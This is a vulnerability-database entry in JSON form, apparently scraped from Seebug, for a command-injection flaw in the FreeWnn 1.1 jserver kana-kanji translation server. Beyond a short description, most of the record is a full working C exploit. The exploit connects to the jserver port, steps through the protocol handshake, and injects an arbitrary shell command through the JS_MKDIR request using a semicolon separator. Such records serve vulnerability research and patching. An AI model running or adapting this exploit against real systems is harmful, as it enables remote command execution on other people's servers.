DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2017-11-19T13:58:00", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "href": "https://www.seebug.org/vuldb/ssvid-75051", "references": [], "enchantments_done": [], "id": "SSV:75051", "title": "FreeWnn 1.1 jserver JS_MKDIR Metacharacter Command Execution Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 8, "sourceData": "\n source: http://www.securityfocus.com/bid/3860/info\r\n\r\nFreeWnn 1.1.0 is a kana-kanji (japanese) translation system. This software is a client-server type application, with the jserver portion acting as a server and performing translations for clients. The jserver component passes unsanitized input from the client via the JS_MKDIR command to a system() libcall, allowing arbitrary command execution with the semi-colon ";" command separation metacharacter. Commands sent in this manner will be executed at the privilege level of the jserver process. \r\n\r\n/*=========================================================================\r\n Wnn6 Exploit (tested on IRIX6.5 WorldView Janapese)\r\n The Shadow Penguin Security (http://www.shadowpenguin.org)\r\n Written by UNYUN (unyun@shadowpenguin.org)\r\n =========================================================================\r\n*/\r\n#include <stdio.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <ctype.h>\r\n#include <unistd.h>\r\n#include <strings.h>\r\n#include <stdlib.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <netinet/in.h>\r\n\r\n#define TARGET_PORT 22273\r\n\r\nint dump_recv(int sockfd)\r\n{\r\n static char buf[4096];\r\n int i,r,sum=0;\r\n\r\n r=recv(sockfd,buf,sizeof(buf),0);\r\n for (i=0;i<r;i++){\r\n printf("0x%02X ",buf[i]&0xff);\r\n sum+=(int)buf[i];\r\n }\r\n printf("\\n");\r\n return(sum);\r\n}\r\n\r\nmain(int argc,char *argv[])\r\n{\r\n int sockfd,i;\r\n struct sockaddr_in target;\r\n struct hostent *hs;\r\n static char buf[512];\r\n static char mkdircmd[4096];\r\n char hostname[4096];\r\n char username[4096];\r\n\r\n if (argc<3){\r\n printf("usage : %s TargetHost command {hostname} {username}\\n",argv[0]);\r\n exit(1);\r\n }\r\n strcpy(hostname,"localhost");\r\n strcpy(username,"root");\r\n if (argc>=5)\r\n strcpy(username,argv[4]);\r\n if (argc>=4)\r\n strcpy(hostname,argv[3]);\r\n sockfd=socket(PF_INET, SOCK_STREAM, 0);\r\n target.sin_family=AF_INET;\r\n target.sin_port=htons(TARGET_PORT);\r\n if ((target.sin_addr.s_addr=inet_addr(argv[1]))==-1){\r\n if ((hs=gethostbyname(argv[1]))==NULL){\r\n printf("Can not resolve specified host.\\n");\r\n exit(1);\r\n }\r\n target.sin_family = hs->h_addrtype;\r\n memcpy((caddr_t)&target.sin_addr.s_addr,hs->h_addr,hs->h_length);\r\n }\r\n if (connect(sockfd, (struct sockaddr*)&target, sizeof(target))!=0){\r\n printf("Can not connect to %s:%d\\n",argv[1],TARGET_PORT);\r\n exit(1);\r\n } \r\n\r\n /* JS_OPEN */\r\n buf[3]=1;\r\n buf[6]=0x4f;\r\n strncpy(buf+8,hostname,strlen(hostname));\r\n strncpy(buf+9+strlen(hostname),username,strlen(username));\r\n send(sockfd,buf,10+strlen(hostname)+strlen(username),0);\r\n dump_recv(sockfd);\r\n\r\n /* JS_ENV_EXIST */\r\n memset(buf,0,sizeof(buf));\r\n buf[3]=0x07;\r\n strncpy(buf+4,username,strlen(username));\r\n send(sockfd,buf,5+strlen(username),0);\r\n dump_recv(sockfd);\r\n\r\n /* JS_CONNECT */\r\n memset(buf,0,sizeof(buf));\r\n buf[3]=0x05;\r\n strncpy(buf+4,username,strlen(username));\r\n send(sockfd,buf,5+strlen(username),0);\r\n dump_recv(sockfd);\r\n\r\n /* JS_MKDIR */\r\n sprintf(mkdircmd,"a;%s",argv[2]);\r\n memset(buf,0,sizeof(buf));\r\n buf[3]=0x51;\r\n strncpy(buf+8,mkdircmd,strlen(mkdircmd));\r\n send(sockfd,buf,8+strlen(mkdircmd)+1,0);\r\n dump_recv(sockfd);\r\n\r\n close(sockfd);\r\n}\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-75051", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645364759}}

{}